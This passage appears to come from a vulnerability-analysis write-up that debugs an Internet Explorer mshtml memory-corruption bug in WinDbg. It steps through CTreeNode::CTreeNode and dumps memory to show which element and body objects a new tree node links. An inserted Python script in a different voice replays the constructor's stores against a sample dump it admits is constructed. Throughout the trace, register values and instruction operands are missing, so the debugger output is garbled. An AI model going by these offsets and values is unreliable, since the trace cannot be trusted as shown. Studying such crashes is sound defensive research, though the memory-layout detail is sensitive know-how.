(6a2a20a8) mshtml!CMarkup::`vftable' | (6a2a21a0) mshtml!CMarkupPointer::`vftable'
Exact matches:
mshtml!CMarkup::`vftable' = <no type information>

Clearly this function obtains a pointer to the CMarkup object.

:> r
eax= ebx=06d62f30 ecx= edx= esi=150e3fd0 edi=
eip=6a1f220a esp=0425e708 ebp=0425e768 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::InsertBeforeHelper+0xb9:
6a1f220a e831000000 call mshtml!CElement::GetDOMInsertPosition (6a1f2240)
:> ln poi(poi(esp))
(6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>
:> ln poi(poi(esp+))
(6a2a21a0) mshtml!CMarkupPointer::`vftable' | (6a2a2278) mshtml!CIPrintCollection::`vftable'
Exact matches:
mshtml!CMarkupPointer::`vftable' = <no type information>

The addresses of these two objects (the body element and the CMarkupPointer) are passed as its arguments.

Breakpoint hit
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bced0 esp=0425e594 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode:
6a2bced0 8bff mov edi,edi
:> kp
ChildEBP RetAddr
0425e590 6a210d02 mshtml!CTreeNode::CTreeNode
0425e630 6a1f1c01 mshtml!CMarkup::InsertElementInternal+0x23d
0425e66c 6a1f1b36 mshtml!CDoc::InsertElement+0x8a
0425e700 6a1f2222 mshtml!CCommentElement::`scalar deleting destructor'+0x23e
0425e768 6a1f2148 mshtml!CElement::InsertBeforeHelper+0xd1
0425e784 6a1f20fe mshtml!CElement::insertBefore+0x3c
0425e7c4 6a1f1436 mshtml!CElement::appendChild+0x3a
0425e7f8 6a32235c mshtml!Method_IDispatchpp_IDispatchp+0xcb
0425e86c 6a32c75a mshtml!CBase::ContextInvokeEx+0x5dc
0425e8bc 6a32c79a mshtml!CElement::ContextInvokeEx+0x9d
0425e8e8 6a2d3104 mshtml!CInput::VersionedInvokeEx+0x2d
0425e93c 6c75a22a mshtml!PlainInvokeEx+0xeb
0425e978 6c75a175 jscript!IDispatchExInvokeEx2+0x104
0425e9b4 6c75a3f6 jscript!IDispatchExInvokeEx+0x6a
0425ea74 6c75a4a0 jscript!InvokeDispatchEx+0x98
0425eaa8 6c76d8c8 jscript!VAR::InvokeByName+0x139
0425eaf4 6c76d96f jscript!VAR::InvokeDispName+0x7d
0425eb20 6c76e3e7 jscript!VAR::InvokeByDispID+0xce
0425ecbc 6c765c9d jscript!CScriptRuntime::Run+0x2b80
0425eda4 6c765bfb jscript!ScrFncObj::CallWithFrameOnStack+0xce


Once CTreeNode::CTreeNode has finished executing we can look at the fully initialized data in memory. Since the first four bytes of a CTreeNode object are the pointer to the element object it belongs to, we only need to read that value.

:> p
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bced2 esp=0425e594 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x2:
6a2bced2 push ebp
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bced3 esp=0425e590 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3:
6a2bced3 8bec mov ebp,esp
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bced5 esp=0425e590 ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x5:
6a2bced5 8a450c mov al,byte ptr [ebp+0Ch] ss::0425e59c=
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bced8 esp=0425e590 ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x8:
6a2bced8 c0e004 shl al,
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bcedb esp=0425e590 ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0xb:
6a2bcedb xor al,byte ptr [ecx+] ds::127c7fb9=
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bcede esp=0425e590 ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0xe:
6a2bcede push esi
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bcedf esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0xf:
6a2bcedf 8b7140 mov esi,dword ptr [ecx+40h] ds::127c7ff0=
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcee2 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x12:
6a2bcee2 and al,10h
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcee4 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x14:
6a2bcee4 xor byte ptr [ecx+],al ds::127c7fb9=
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcee7 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x17:
6a2bcee7 8a5109 mov dl,byte ptr [ecx+] ds::127c7fb9=
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bceea esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x1a:
6a2bceea b8ffffffff mov eax,0FFFFFFFFh
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bceef esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x1f:
6a2bceef 6689410a mov word ptr [ecx+0Ah],ax ds::127c7fba=
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcef3 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x23:
6a2bcef3 0bc0 or eax,eax
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcef5 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x25:
6a2bcef5 83e607 and esi,
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcef8 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x28:
6a2bcef8 83ce08 or esi,
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcefb esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x2b:
6a2bcefb 6689410c mov word ptr [ecx+0Ch],ax ds::127c7fbc=
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bceff esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x2f:
6a2bceff 83c8ff or eax,0FFFFFFFFh
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf02 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x32:
6a2bcf02 mov dword ptr [ecx+40h],esi ds::127c7ff0=
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf05 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x35:
6a2bcf05 6689410e mov word ptr [ecx+0Eh],ax ds::127c7fbe=
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf09 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x39:
6a2bcf09 mov dword ptr [ecx],edi ds::127c7fb0=
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf0b esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3b:
6a2bcf0b 85ff test edi,edi
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf0d esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3d:
6a2bcf0d je mshtml!CTreeNode::CTreeNode+0x45 (6a2bcf15) [br=]
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf0f esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3f:
6a2bcf0f 8a4718 mov al,byte ptr [edi+18h] ds::1af02ff0=
:>
eax=ffffff60 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf12 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x42:
6a2bcf12 mov byte ptr [ecx+],al ds::127c7fb8=
:>
eax=ffffff60 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf15 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x45:
6a2bcf15 8b4508 mov eax,dword ptr [ebp+] ss::0425e598=15171fb0
:>
eax=15171fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf18 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x48:
6a2bcf18 mov dword ptr [ecx+],eax ds::127c7fb4=
:>
eax=15171fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf1b esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x4b:
6a2bcf1b 85ff test edi,edi
:>
eax=15171fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf1d esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x4d:
6a2bcf1d 0f84f15deaff je mshtml!CTreeNode::CTreeNode+0x5a (6a162d14) [br=]
:>
eax=15171fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf23 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x4f:
6a2bcf23 0fb64108 movzx eax,byte ptr [ecx+] ds::127c7fb8=
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf27 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x53:
6a2bcf27 e8cd020000 call mshtml!IsPreLikeTag (6a2bd1f9)
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf2c esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x5c:
6a2bcf2c 85c0 test eax,eax
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf2e esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x5e:
6a2bcf2e 0f95c0 setne al
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf31 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x61:
6a2bcf31 c0e003 shl al,
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf34 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x64:
6a2bcf34 32c2 xor al,dl
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf36 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x66:
6a2bcf36 and al,
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf38 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x68:
6a2bcf38 32c2 xor al,dl
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf3a esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x6a:
6a2bcf3a mov byte ptr [ecx+],al ds::127c7fb9=
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf3d esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x6d:
6a2bcf3d 85ff test edi,edi
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf3f esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x6f:
6a2bcf3f 0f84d65deaff je mshtml!CTreeNode::CTreeNode+0x7c (6a162d1b) [br=]
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf45 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x71:
6a2bcf45 0fb64108 movzx eax,byte ptr [ecx+] ds::127c7fb8=
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf49 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x75:
6a2bcf49 e8ab020000 call mshtml!IsPreLikeTag (6a2bd1f9)
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf4e esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x7e:
6a2bcf4e 33d2 xor edx,edx
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf50 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x80:
6a2bcf50 85c0 test eax,eax
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf52 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x82:
6a2bcf52 0f95c2 setne dl
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf55 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x85:
6a2bcf55 8bc1 mov eax,ecx
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf57 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x87:
6a2bcf57 33d6 xor edx,esi
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf59 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x89:
6a2bcf59 83e201 and edx,
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf5c esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x8c:
6a2bcf5c 33d6 xor edx,esi
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf5e esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x8e:
6a2bcf5e mov dword ptr [ecx+40h],edx ds::127c7ff0=
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf61 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x91:
6a2bcf61 5e pop esi
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bcf62 esp=0425e590 ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x92:
6a2bcf62 5d pop ebp
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bcf63 esp=0425e594 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x93:
6a2bcf63 c20800 ret
:> dd eax
127c7fb0 1af02fd8 15171fb0 ffff0060 ffffffff
127c7fc0
127c7fd0
127c7fe0
127c7ff0 d0d0d0d0
127c8000 ???????? ???????? ???????? ????????
127c8010 ???????? ???????? ???????? ????????
127c8020 ???????? ???????? ???????? ????????
:> dd 1af02fd8
1af02fd8 6a0f70e0
1af02fe8 071faee0
1af02ff8 18b1cfe8 ???????? ????????
1af03008 ???????? ???????? ???????? ????????
1af03018 ???????? ???????? ???????? ????????
1af03028 ???????? ???????? ???????? ????????
1af03038 ???????? ???????? ???????? ????????
1af03048 ???????? ???????? ???????? ????????
:> ln 6a0f70e0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>

So this CTreeNode belongs to the CPhraseElement; in other words, the statement document.body.appendChild(id_0); in the POC results in a CTreeNode object being created for the Phrase object. Which node is this CTreeNode linked into, then? Judging from the JS we guess it is the body object.

:> dd eax
127c7fb0 1af02fd8 15171fb0 ffff0060 ffffffff
127c7fc0
127c7fd0
127c7fe0
127c7ff0 d0d0d0d0
127c8000 ???????? ???????? ???????? ????????
127c8010 ???????? ???????? ???????? ????????
127c8020 ???????? ???????? ???????? ????????
:> dd 15171fb0
15171fb0 150e3fd0 1379cfb0
15171fc0 1515ffc0 15171fd8
15171fd0 1515ffd8 1976dfe0
15171fe0 1362afd8 13e48fe0 13e48fe0 1379cfd8
15171ff0 d0d0d0d0
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
:> dd 150e3fd0
150e3fd0 6a246670 07701fe8
150e3fe0 071fae80 15171fb0 8202e280
150e3ff0 104d4f00 d0d0d0d0
150e4000 ???????? ???????? ???????? ????????
150e4010 ???????? ???????? ???????? ????????
150e4020 ???????? ???????? ???????? ????????
150e4030 ???????? ???????? ???????? ????????
150e4040 ???????? ???????? ???????? ????????
:> ln 6a246670
(6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>

Sure enough, it is the body object.
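To make the CTreeNode layout concrete, here is an added example (my own reconstruction, not code from this post or from mshtml) that replays the stores of CTreeNode::CTreeNode exactly as the single-step trace above shows them, and then decodes a node the way the dd dumps after the constructor returns are read. The offsets (+0 element pointer, +4 parent node, +8 tag byte copied from [element+18h], +9 flag byte, +0xA/+0xC/+0xE words set to -1, +0x40 flag dword) come from the disassembly on the page; the field names, the 0x44-byte buffer size, and the assumption that the fresh allocation is zero-filled are mine. The sample dd text is constructed: it is modeled on the dump of the first node at 127c7fb0, with the all-zero cells that this copy of the page dropped restored and +0x40 set to the value the replay predicts, so it is not a value visible on the page.

```python
import struct

# Region the constructor touches; the last store observed is the dword at +0x40,
# so 0x44 bytes is an assumption that covers every write in the trace.
NODE_SIZE = 0x44


def set_bit(old, bit, value):
    """Copy `value` into bit `bit` of `old` with the xor/and/xor idiom seen in
    the constructor (shl al,4 / xor al,[ecx+9] / and al,10h / xor [ecx+9],al).
    All other bits of `old` are preserved."""
    mask = 1 << bit
    delta = (((1 if value else 0) << bit) ^ old) & mask
    return old ^ delta


def ctreenode_ctor(element, parent, elem_tag_byte, is_pre_like, arg_byte,
                   prior_flags40=0):
    """Replay CTreeNode::CTreeNode's stores on a zero-filled node buffer.
    element       -> edi, the owning CElement (0 takes the 'je' paths)
    parent        -> [ebp+8], stored at +4 (the node this one hangs under)
    elem_tag_byte -> the byte at [element+18h] (copied to +8)
    is_pre_like   -> what IsPreLikeTag returns for that tag byte
    arg_byte      -> the byte argument at [ebp+0Ch]
    prior_flags40 -> whatever the allocator left at +0x40 (0 in the trace)"""
    node = bytearray(NODE_SIZE)
    node[9] = set_bit(node[9], 4, arg_byte & 1)               # bit4 of +9 := arg
    struct.pack_into('<HHH', node, 0xA, 0xFFFF, 0xFFFF, 0xFFFF)  # +0xA,+0xC,+0xE := -1
    flags40 = (prior_flags40 & 7) | 8                         # and esi,7 / or esi,8
    struct.pack_into('<I', node, 0x40, flags40)
    struct.pack_into('<I', node, 0, element)                  # mov [ecx],edi
    if element:
        node[8] = elem_tag_byte & 0xFF                        # mov al,[edi+18h] / mov [ecx+8],al
    struct.pack_into('<I', node, 4, parent)                   # mov eax,[ebp+8] / mov [ecx+4],eax
    if element:
        node[9] = set_bit(node[9], 3, is_pre_like)            # setne al / shl al,3 / xor-and-xor
        flags40 = set_bit(flags40, 0, is_pre_like)            # setne dl / xor-and-xor with esi
        struct.pack_into('<I', node, 0x40, flags40)
    return node


def decode_node(node):
    """Read the fields back out of a node buffer (names are my labels)."""
    element, parent = struct.unpack_from('<II', node, 0)
    w_a, w_c, w_e = struct.unpack_from('<HHH', node, 0xA)
    (flags40,) = struct.unpack_from('<I', node, 0x40)
    return {
        'element': element, 'parent': parent,
        'tag': node[8], 'flags': node[9],
        'bit4_arg': bool(node[9] & 0x10), 'bit3_prelike': bool(node[9] & 0x08),
        'w0a': w_a, 'w0c': w_c, 'w0e': w_e, 'flags40': flags40,
    }


def dd_words(node, offset=0, count=4):
    """Render a slice the way WinDbg's dd prints it, for eyeballing against a dump."""
    return ['%08x' % w for w in struct.unpack_from('<%dI' % count, node, offset)]


def parse_dd(text):
    """Parse WinDbg `dd` output lines into {address: dword}; '????????' cells
    (unmapped memory beyond the page-heap page) are skipped."""
    mem = {}
    for line in text.strip().splitlines():
        parts = line.split()
        base = int(parts[0], 16)
        for i, cell in enumerate(parts[1:]):
            if cell != '????????':
                mem[base + 4 * i] = int(cell, 16)
    return mem


def node_from_dump(text, base, size=NODE_SIZE):
    """Rebuild a node buffer from a dd dump; cells absent from the dump read as 0."""
    mem = parse_dd(text)
    buf = bytearray(size)
    for off in range(0, size, 4):
        struct.pack_into('<I', buf, off, mem.get(base + off, 0))
    return buf


# Constructed sample modeled on the page's `dd eax` after the first
# CTreeNode::CTreeNode returns (zero cells restored, +0x40 predicted by the replay).
SAMPLE_DD = """
127c7fb0 1af02fd8 15171fb0 ffff0060 ffffffff
127c7fc0 00000000 00000000 00000000 00000000
127c7fd0 00000000 00000000 00000000 00000000
127c7fe0 00000000 00000000 00000000 00000000
127c7ff0 00000008 d0d0d0d0 d0d0d0d0 d0d0d0d0
"""

if __name__ == '__main__':
    # Inputs as observed in the trace: edi=1af02fd8 (CPhraseElement), [ebp+8]=15171fb0
    # (the body's CTreeNode), [edi+18h]=0x60, IsPreLikeTag returned 0, [ebp+0Ch]=0.
    replay = ctreenode_ctor(0x1af02fd8, 0x15171fb0, 0x60, False, 0)
    dumped = node_from_dump(SAMPLE_DD, 0x127c7fb0)
    print('replay :', dd_words(replay), dd_words(replay, 0x40, 1))
    print('dump   :', dd_words(dumped), dd_words(dumped, 0x40, 1))
    print('fields :', decode_node(dumped))
    print('match  :', replay == dumped)
```

Running it reproduces the first line of the dump (1af02fd8 15171fb0 ffff0060 ffffffff) from the register values alone, which is a quick way to confirm a reading of a constructor before trusting the offsets in later analysis; feeding parse_dd a real dd listing lets the same decoder be pointed at any node address pulled from the trace.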

:> r
eax= ebx=0425e960 ecx= edx= esi=0425e950 edi=0425e950
eip=6c77d711 esp=0425e834 ebp=0425e870 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
jscript!sin:
6c77d711 ff256810756c jmp dword ptr [jscript!_imp__sin (6c751068)] ds::6c751068={msvcrt!sin (773d8aea)}

We hit our auxiliary debugging statement as intended.

:> g
Breakpoint hit
eax=06c3efd8 ebx=6a628b0c ecx=6a1f20c4 edx=0425e7f4 esi= edi=
eip=6a1f20c4 esp=0425e7c8 ebp=0425e7f8 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::appendChild:
6a1f20c4 8bff mov edi,edi

This break is caused by the second appendChild; debug it in the same way.

:> g
Breakpoint hit
eax=06c3efd8 ebx=6a628b0c ecx=6a1f20c4 edx=0425e7f4 esi= edi=
eip=6a1f20c4 esp=0425e7c8 ebp=0425e7f8 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::appendChild:
6a1f20c4 8bff mov edi,edi
:> g
Breakpoint hit
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bced0 esp=0425e594 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode:
6a2bced0 8bff mov edi,edi
:> p
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bced2 esp=0425e594 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x2:
6a2bced2 push ebp
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bced3 esp=0425e590 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3:
6a2bced3 8bec mov ebp,esp
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bced5 esp=0425e590 ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x5:
6a2bced5 8a450c mov al,byte ptr [ebp+0Ch] ss::0425e59c=
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
